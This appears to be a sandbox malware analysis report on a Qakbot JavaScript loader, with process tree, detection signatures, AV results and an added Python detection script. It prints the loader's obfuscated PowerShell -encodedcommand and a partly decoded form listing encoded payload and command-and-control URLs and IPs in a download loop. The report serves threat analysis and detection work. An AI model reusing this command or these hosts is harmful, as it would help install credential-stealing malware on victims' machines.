Windows Analysis Report
Semischolastica.js

Overview

General Information

Sample Name: Semischolastica.js
Analysis ID: 876155
MD5: 476fad0a9b9f0b665b416beb78b55cff
SHA1: c5631292a9e8c5887e3674c819cd3ee4aab786dd
SHA256: aa18039b1459c1054b2ead589186d0c3e1e02cdfebf5f4642e1b5cc13af8c104
Tags: js

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Antivirus detection for dropped file
Wscript starts Powershell (via cmd or directly)
Encrypted powershell cmdline option found
Very long command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Java / VBScript file with very long strings (likely obfuscated code)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5812 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Semischolastica.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • wscript.exe (PID: 6660 cmdline: "C:\Windows\System32\wscript.exe" "C:\ProgramData\WeigelasScribbleable.js" ProtopathicCosmographically pachisisCounterproductiveness KnowingestGemmer theoreticianRoundishness MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
      • powershell.exe (PID: 6908 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "… MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 4964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
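The tree above is the whole story of the loader: the initial wscript.exe writes and re-launches C:\ProgramData\WeigelasScribbleable.js, and that second wscript.exe starts powershell.exe with -encodedcommand. The signatures "Wscript starts Powershell (via cmd or directly)", "Encrypted powershell cmdline option found" and "Very long command line found" (the report logs a command line size of 7544) describe exactly the properties a host-side rule can key on. The following is an added example, not Joe Sandbox code: it evaluates Sysmon-style process-creation records. The records are constructed here from the command lines in the tree (the real encoded argument is cut to its first 88 characters, so the length check does not fire on it), the field names ParentImage / Image / CommandLine and the 4096-byte length threshold are assumptions, and the flag matcher accepts any prefix of -EncodedCommand because powershell.exe does.

```python
"""Host-side checks for the wscript.exe -> powershell.exe -encodedcommand chain
(added example; not Joe Sandbox code)."""
import base64
from typing import Dict, List

# Assumed threshold: the report logs "Commandline size = 7544" for this sample.
LONG_CMDLINE = 4096
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# First 88 characters of the -encodedcommand argument quoted in the report.
ENCODED_HEAD = (
    "JABhAHYAYQBuAHQAbABhAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYA"
)

# Constructed Sysmon-style records; command lines 1 and 2 are the ones in the tree.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {  # PID 6908: encoded argument truncated to ENCODED_HEAD
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "' + ENCODED_HEAD,
    },
    {  # PID 6660: wscript re-launching the dropped script
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "Image": r"C:\Windows\System32\wscript.exe",
        "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\ProgramData\WeigelasScribbleable.js" ProtopathicCosmographically pachisisCounterproductiveness KnowingestGemmer theoreticianRoundishness',
    },
    {  # constructed benign baseline
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe -NoProfile -Command "Get-Date"',
    },
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def _is_encoded_flag(token: str) -> bool:
    """powershell.exe accepts any prefix of -EncodedCommand (-e, -ec, -enc, ...)."""
    t = token.strip('"').lower()
    return t == "-ec" or (len(t) >= 2 and "-encodedcommand".startswith(t))


def encoded_payload(cmdline: str):
    """Return the argument that follows the -EncodedCommand flag, or None."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        if _is_encoded_flag(tok):
            return toks[i + 1].strip('"')
    return None


def decodes_as_script(b64: str) -> bool:
    """-EncodedCommand payloads are base64 over UTF-16LE text; a real script
    decodes to printable text (plus line breaks), arbitrary base64 does not."""
    try:
        text = base64.b64decode(b64, validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both subclass it
        return False
    return bool(text) and all(ch.isprintable() or ch in "\r\n\t" for ch in text)


def evaluate(event: Dict[str, str]) -> List[str]:
    """Names of the checks that fire for one process-creation record."""
    hits = []
    parent = _basename(event["ParentImage"])
    image = _basename(event["Image"])
    cmd = event["CommandLine"]
    if parent in SCRIPT_HOSTS and image in POWERSHELL:
        hits.append("wscript_spawns_powershell")
    payload = encoded_payload(cmd)
    if payload is not None:
        hits.append("encoded_command_flag")
        if decodes_as_script(payload):
            hits.append("payload_is_utf16_script")
    if len(cmd) > LONG_CMDLINE:
        hits.append("very_long_command_line")
    return hits


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(_basename(ev["Image"]), "<-", _basename(ev["ParentImage"]), evaluate(ev))
```

Each check is weak on its own (administrators do run encoded commands), which is why the function returns the set of fired checks rather than a verdict; a script host as parent plus an encoded payload that really is a script is the combination worth alerting on.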
No configs have been found
Source: Process Memory Space: powershell.exe PID: 6908
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x6cd89:$b2: ::FromBase64String(
  • 0x1d7c9:$s1: -join
  • 0x1d84f:$s1: -join
  • 0x1d964:$s1: -join
  • 0x1dba8:$s1: -join
  • 0x1dbda:$s1: -join
  • 0x1dc22:$s1: -join
  • 0x1dc4f:$s1: -join
  • 0x1e0ba:$s1: -join
  • 0x1e116:$s1: -join
  • 0x1e14e:$s1: -join
  • 0x1e19d:$s1: -join
  • 0x1ec00:$s1: -join
  • 0x2063c:$s1: -join
  • 0x2f399:$s1: -join
  • 0xa0fcc:$s1: -join
  • 0xae0a1:$s1: -join
  • 0xb1473:$s1: -join
  • 0xb1b25:$s1: -join
  • 0xb3616:$s1: -join
  • 0xb581c:$s1: -join
No Sigma rule has matched
No Snort rule has matched


AV Detection

Source: Semischolastica.js | Avira: detected
Source: Semischolastica.js | ReversingLabs: Detection: 13%
Source: Semischolastica.js | Virustotal: Detection: 30%
Source: C:\ProgramData\WeigelasScribbleable.js | Avira: detection malicious, Label: JS/Qakbot.G
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbs089 source: powershell.exe, 00000003.00000002.965250834.0000021D7D1A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb9 source: powershell.exe, 00000003.00000002.965436092.0000021D7D204000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbGM= source: powershell.exe, 00000003.00000002.965436092.0000021D7D24F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000003.00000002.964639964.0000021D7D004000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000003.00000002.965436092.0000021D7D204000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.pdbY source: powershell.exe, 00000003.00000002.964639964.0000021D7CFA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: powershell.exe, 00000003.00000002.965436092.0000021D7D24F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000003.00000002.965436092.0000021D7D204000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000003.00000002.964639964.0000021D7CFBA000.00000004.00000020.00020000.00000000.sdmp
Source: powershell.exe, 00000003.00000002.964639964.0000021D7D004000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000003.00000002.962884479.0000021D75007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.942982234.0000021D651B0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.942982234.0000021D64FA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.942982234.0000021D651B0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.942982234.0000021D651B0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: wscript.exe, 00000000.00000003.576624721.000001CC97AFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.576968524.000001CC99F11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.579865423.000001CC99B10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.579593243.000001CC99A00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.592556553.0000017FB91B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.592773841.0000017FB92B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.590632857.0000017FB96B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.582806752.0000017FB72FD000.00000004.00000020.00020000.00000000.sdmp, Semischolastica.js, WeigelasScribbleable.js.0.dr | String found in binary or memory: https://github.com/imaya/zlib.js
Source: powershell.exe, 00000003.00000002.942982234.0000021D66B29000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.962884479.0000021D75007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Source: Process Memory Space: powershell.exe PID: 6908, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "…
Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 7544
Source: Process Memory Space: powershell.exe PID: 6908, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Semischolastica.js | Initial sample: Strings found which are bigger than 50
Source: Semischolastica.js | ReversingLabs: Detection: 13%
Source: Semischolastica.js | Virustotal: Detection: 30%
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Semischolastica.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\WeigelasScribbleable.js" ProtopathicCosmographically pachisisCounterproductiveness KnowingestGemmer theoreticianRoundishness
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABhAHYAYQBuAHQAbABhAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBiAHcAQgB5AEEARwA0AEEAYQBRAEIAbQBBAEcAawBBAFkAdwBBAHUAQQBHAE0AQQBZAFEAQgB6AEEARwBFAEEAYQBuAG4AcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBNAHcAQQB1AEEARABJAEEATgBRAEEAdwBBAEMANABBAE0AUQBBADIAQQBEAGsAQQBMAGcAQQAxAEEARABjAEEAYQBuAG4AcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBZAFEAQgAxAEEARwA0AEEAWQB3AEIAbwBBAEcAawBBAFoAUQBCAHkAQQBDADQAQQBaAHcAQgBoAEEARwAwAEEAWgBRAEIAegBBAEEAPQA9AGEAbgBuAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQB3AEEAdQBBAEQAWQBBAE0AdwBBAHUAQQBEAFEAQQBOAGcAQQB1AEEARABFAEEATQB3AEEANQBBAEEAPQA9ACIAOwAkAGYAbABlAHQAYwBoAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAYwBBAGIAdwBCAGgAQQBHAFEAQQBaAFEAQgB5AEEARgBBAEEAYQBBAEIAaABBAEcANABBAFoAUQBCAHkAQQBHADgAQQBaAHcAQgBoAEEARwAwAEEAYQBRAEIAaABBAEMANABBAGIAQQBCAHAAQQBHADQAQQBhAHcAQQA9ACIAOwAkAFEAdQBpAHoAegBlAGUARABlAGMAZQBsAGUAcgBvAG0AZQB0AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE4AUQBBAHUAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATgBnAEEAegBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQAiADsAJABpAG0AbQBhAHIAYwBlAHMAYwBpAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQARQBBAE0AUQBBADMAQQBDADQAQQBNAFEAQQAxAEEARABVAEEATABnAEEAMwBBAEQAUQBBAEwAdwBCADYAQQBFAFEAQQBNAGcAQgBrAEEARQBJAEEATAB3AEIAMwBBAEQAUQBBAFQAUQBBAD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABrAEEATgB3AEEAdQBBAEQARQBBAE0AdwBBADIAQQBDADQAQQBOAEEAQQAxAEEAQwA4AEEAVABnAEIATgBBAEUASQBBAFQAQQBBAHYAQQBHAEUAQQBSAFEAQgA1AEEARQA0AEEAYgB3AEEAPQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAawBBAEwAZwBBADQAQQBEAEkAQQBMAGcAQQAxAEEARABJAEEATABnAEEAMgBBAEQAVQBBAEwAdw
BBAHkAQQBHAFkAQQBMAHcAQgBUAEEAQQA9AD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBNAFEAQQB3AEEARABRAEEATAB3AEIAVQBBAEUAdwBBAFIAdwBCAG8AQQBFADQAQQBaAEEAQQB2AEEARQB3AEEAWgBBAEIAWABBAEcAUQBBAFIAQQBCAEcAQQBBAD0APQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBIAGcAQQBhAEEAQgBaAEEASABnAEEAZABBAEIAUgBBAEQAQQBBAFMAUQBBAD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATAB3AEIAUQBBAEgAQQBBAFYAUQBCAFoAQQBGAGcAQQBMAHcAQQA0AEEARQBZAEEATgBRAEIATgBBAEQAVQBBAE4AdwBCAEIAQQBFAG8AQQBaAEEAQQA1AEEARwBJAEEATQB3AEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABUAGUAbgBhAGkAbABsAGUAIABpAG4AIAAkAGkAbQBtAGEAcgBjAGUAcwBjAGkAYgBsAGUAIAAtAHMAcABsAGkAdAAgACIAUQAiACkAIAB7AHQAcgB5ACAAewAkAEEAcgB0AGkAZgBpAGMAaQBhAGwAaQB0AGkAZQBzACAAPQ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4964:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lsaixmmc.yur.ps1
Source: classification engine | Classification label: mal92.evad.winJS@6/6@0/0
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Data Obfuscation

Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: wscript", ""C:\ProgramData\WeigelasScribbleable.js", "", "open", "0");
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (6 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (79 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9875
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4940 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: powershell.exe, 00000003.00000002.965436092.0000021D7D204000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe | Process created: Base64 decoded $avantlay = "aAB0AHQAcABzADoALwAvAGMAbwByAG4AaQBmAGkAYwAuAGMAYQBzAGEAannpaAB0AHQAcABzADoALwAvADYAMwAuADIANQAwAC4AMQA2ADkALgA1ADcAannpaAB0AHQAcABzADoALwAvAFIAYQB1AG4AYwBoAGkAZQByAC4AZwBhAG0AZQBzAA==annpaAB0AHQAcABzADoALwAvADcAMwAuADYAMwAuADQANgAuADEAMwA5AA==";$fletches = "aAB0AHQAcABzADoALwAvAFcAbwBhAGQAZQByAFAAaABhAG4AZQByAG8AZwBhAG0AaQBhAC4AbABpAG4AawA=";$QuizzeeDecelerometer = "aAB0AHQAcAA6AC8ALwAxADEANQAuADEANgA4AC4ANgAzAC4AMgAxADMA";$immarcescible = "aAB0AHQAcAA6AC8ALwAxADUAMQAuADEAMQA3AC4AMQA1ADUALgA3ADQALwB6AEQAMgBkAEIALwB3ADQATQA=QaAB0AHQAcAA6AC8ALwAxADkAMAAuADkANwAuADEAMwA2AC4ANAA1AC8ATgBNAEIATAAvAGEARQB5AE4AbwA=QaAB0AHQAcAA6AC8ALwA4ADkALgA4ADIALgA1ADIALgA2ADUALwAyAGYALwBTAA==QaAB0AHQAcAA6AC8ALwAxADkAMgAuADEAMgAxAC4AMgAzAC4AMQAwADQALwBUAEwARwBoAE4AZAAvAEwAZABXAGQARABGAA==QaAB0AHQAcAA6AC8ALwAxADkAMgAuADEAMgAxAC4AMgAzAC4ANgAxAC8AOQBhADYANwBwAGUAcwAvAHgAaABZAHgAdABRADAASQA=QaAB0AHQAcAA6AC8ALwAxADQAOQAuADEANQA0AC4AMQA1ADkALgA5ADgALwBQAHAAVQBZAFgALwA4AEYANQBNADUANwBBAEoAZAA5AGIAMwA=";foreach ($Tenaille in $immarcescible -split "Q") {try {$Artificialities = "aAB0AHQAcAA6AC8ALwAxADUAOQAuADEAMgA2AC4AMgA0ADYALgA5ADYA";$hydraulicCappadocian = "aAB0AHQAcABzADoALwAvADcAMQAuADEANAAwAC4AMQA0ADIALgAyADQAMAA=IaAB0AHQAcABzADoALwAvADEANAAzAC4AMQA3ADQALgAxADkANQAuADEANQAyAA==IaAB0AHQAcAA6AC8ALwBCAGwAbwBjAGsAcABhAHQAZQAuAHMAdQBwAHAAbAB5AA==IaAB0AHQAcABzADoALwAvADIAMQA0AC4AMgAwADgALgA0ADIALgA5ADAA";$imbricately = "aAB0AHQAcAA6AC8ALwBxAHUAaQBkAGEAbQAuAGUAbgBnAGkAbgBlAGUAcgBpAG4AZwA=
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "…
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\WeigelasScribbleable.js" ProtopathicCosmographically pachisisCounterproductiveness KnowingestGemmer theoreticianRoundishness
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (5 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 11 Command and Scripting Interpreter | Path Interception | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Data Obfuscation | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | 22 Scripting | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 22 Scripting | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Obfuscated Files or Information | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 12 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Source | Detection | Scanner | Label | Link
Semischolastica.js | 14% | ReversingLabs | Script-JS.Trojan.Cryxos |
Semischolastica.js | 31% | Virustotal | | Browse
Semischolastica.js | 100% | Avira | JS/Qakbot.G |
Source | Detection | Scanner | Label | Link
C:\ProgramData\WeigelasScribbleable.js | 100% | Avira | JS/Qakbot.G |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.962884479.0000021D75007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmp | false | | high
